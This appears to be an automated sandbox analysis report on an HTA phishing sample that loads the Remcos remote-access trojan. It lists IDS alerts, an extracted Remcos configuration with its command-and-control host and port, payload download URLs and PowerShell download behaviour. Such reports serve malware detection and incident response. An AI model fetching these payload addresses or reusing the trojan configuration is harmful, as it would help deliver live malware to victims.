                    2024-11-18T16:53:21.663046+0100 | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.8    | 55649       | 192.227.228.36  | 14645            | TCP
                    2024-11-18T16:53:23.333996+0100 | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.8    | 55650       | 192.227.228.36  | 14645            | TCP
                    2024-11-18T16:53:23.948023+0100 | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.8    | 55652       | 192.227.228.36  | 14645            | TCP
                    2024-11-18T16:52:38.759543+0100 | 2049038 | 1        | A Network Trojan was detected                 | 142.215.209.78 | 443         | 192.168.2.8     | 49706            | TCP
                    2024-11-18T16:53:23.817150+0100 | 2803304 | 3        | Unknown Traffic                               | 192.168.2.8    | 55651       | 178.237.33.50   | 80               | TCP
                    2024-11-18T16:52:10.021973+0100 | 2858295 | 1        | A Network Trojan was detected                 | 23.94.171.138  | 80          | 192.168.2.8     | 55648            | TCP
                    2024-11-18T16:52:56.510461+0100 | 2858796 | 1        | A Network Trojan was detected                 | 192.168.2.8    | 55648       | 23.94.171.138   | 80               | TCP
                    2024-11-18T16:52:23.601751+0100 | 2858795 | 1        | A Network Trojan was detected                 | 192.168.2.8    | 49705       | 23.94.171.138   | 80               | TCP

                    AV Detection

                    Source: nextnewupdationsforu.duckdns.org | Avira URL Cloud: Label: malware
                    Source: 0000000C.00000002.3861630082.0000000000F47000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["nextnewupdationsforu.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EC111K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                    Source: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | ReversingLabs: Detection: 21%
                    Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.3861630082.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTR
                    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043293A
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

                    Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTR

                    Privilege Escalation

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764

                    Phishing

                    Source: Yara match | File source: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta, type: SAMPLE
                    Source: unknown | HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.8:49706 version: TLS 1.2
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1919215774.0000000006EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1921977762.000000000756A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbd source: powershell.exe, 00000003.00000002.1482539113.0000000008462000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncount
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1919215774.0000000006EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1921977762.000000000756A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbE source: powershell.exe, 00000003.00000002.1482460145.0000000008446000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: q8C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.pdb source: powershell.exe, 00000001.00000002.1589019492.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb4 source: powershell.exe, 00000003.00000002.1482539113.0000000008462000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1921977762.000000000756A000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0044D5E9 FindFirstFileExA,12_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_045710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_045710F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_04576580 FindFirstFileExA,12_2_04576580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_10005C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_10005C00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_10007E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_10007E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_100073F0 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,12_2_100073F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_10018AD0 FindFirstFileExA,12_2_10018AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0040AE51 FindFirstFileW,FindNextFileW,18_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

                    Software Vulnerabilities

                    Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    Source: Network traffic | Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.8:49705 -> 23.94.171.138:80
                    Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:55650 -> 192.227.228.36:14645
                    Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:55649 -> 192.227.228.36:14645
                    Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:55652 -> 192.227.228.36:14645
                    Source: Network traffic | Suricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.8:55648 -> 23.94.171.138:80
                    Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 23.94.171.138:80 -> 192.168.2.8:55648
                    Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 23.94.171.138:80 -> 192.168.2.8:55648
                    Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 23.94.171.138:80 -> 192.168.2.8:55648
                    Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.8:49706
                    Source: Malware configuration extractor | URLs: nextnewupdationsforu.duckdns.org
                    Source: unknown | DNS query: name: nextnewupdationsforu.duckdns.org
                    Source: global traffic | HTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1 | Host: 1017.filemail.com | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /329/FRSSDE.txt HTTP/1.1 | Host: 23.94.171.138 | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                    Source: Joe Sandbox View | IP Address: 94.245.104.56
                    Source: Joe Sandbox View | IP Address: 18.244.18.27
                    Source: Joe Sandbox View | IP Address: 142.215.209.78
                    Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:55651 -> 178.237.33.50:80
                    Source: unknown | TCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_03104BB0 URLDownloadToFileW,1_2_03104BB0
                    Source: global traffic | HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 | Host: api.edgeoffer.microsoft.com | Connection: keep-alive | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global traffic | HTTP traffic detected: GET /crx/blobs/AW50ZFuKxXfmS97pgdN117JdnzteDOW0nOxXPbIMSOJi_zMXlj_Y84pRZgGX1_WSw7i6yKhrqpdS319KewJbpE_4ZxBd62lsUferdiEuq7Yg9JR92C5gtrLldrMl4JgnY0IAxlKa5RR9kAwB758lMbnQOIDqR06lx1aH/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1 | Host: clients2.googleusercontent.com | Connection: keep-alive | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global traffic | HTTP traffic detected: GET /329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 23.94.171.138 | Connection: Keep-Alive
                    Source: CasPol.exe | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: CasPol.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: global traffic | DNS traffic detected: DNS query: 1017.filemail.com
                    Source: global traffic | DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                    Source: global traffic | DNS traffic detected: DNS query: nextnewupdationsforu.duckdns.org
                    Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                    Source: global traffic | DNS traffic detected: DNS query: ntp.msn.com
                    Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
                    Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
                    Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
                    Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
                    Source: global traffic | DNS traffic detected: DNS query: c.msn.com
                    Source: global traffic | DNS traffic detected: DNS query: api.msn.com
                    Source: powershell.exe, 00000001.00000002.1588165227.00000000031DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.94.171.138/
                    Source: powershell.exe, 00000001.00000002.1589019492.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://23.94.171.138/329/createt
                    Source: powershell.exe, 00000001.00000002.1589019492.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF
                    Source: powershell.exe, 00000001.00000002.1588165227.00000000031DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF5
                    Source: powershell.exe, 00000001.00000002.1600493692.0000000007707000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIFLMEM
                    Source: powershell.exe, 00000001.00000002.1588165227.0000000003286000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1920551053.0000000007460000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
                    Source: powershell.exe, 00000003.00000002.1480842016.0000000007465000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microso
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://dns-tunnel-check.googlezip.net/connect2
                    Source: CasPol.exe, CasPol.exe, 0000000C.00000002.3863782930.0000000000F98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000003.00000002.1476840604.000000000510D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000001.00000002.1597053881.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1478768021.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000001.00000002.1589019492.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1476840604.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2380307874.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000004C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tls-tunnel-check.googlezip.net/connect2
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: CasPol.exe | String found in binary or memory: http://www.ebuddy.com
                    Source: CasPol.exe | String found in binary or memory: http://www.imvu.com
                    Source: powershell.exe, 00000003.00000002.1480842016.0000000007465000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c
                    Source: CasPol.exe | String found in binary or memory: http://www.nirsoft.net/
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://1017.filemail.com
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
                    Source: powershell.exe, 00000003.00000002.1475637134.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aka..FT_
                    Source: powershell.exe, 00000001.00000002.1589019492.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1476840604.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2380307874.0000000004E89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2380307874.0000000004E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000004C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chromecontentsuggestions-pa.googleapis.com/v1/suggestions/fetch2
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chromefeedcontentsuggestions-pa.googleapis.com/v2/suggestions/fetch26
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chromefeedcontentsuggestions-pa.googleapis.com/v2/suggestions/fetchb
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163456123.0000372001540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174745448.00003720016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172600956.0000372001650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163283126.0000372001524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chromeupboarding-pa.googleapis.com2
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chromeupboarding-pa.googleapis.com2P
                    Source: chrome.exe, 00000010.00000002.2189386045.000001FB6FA08000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2121760597.00003FE8002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2121681801.00003FE8002D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://clients2.google.com/cr/report
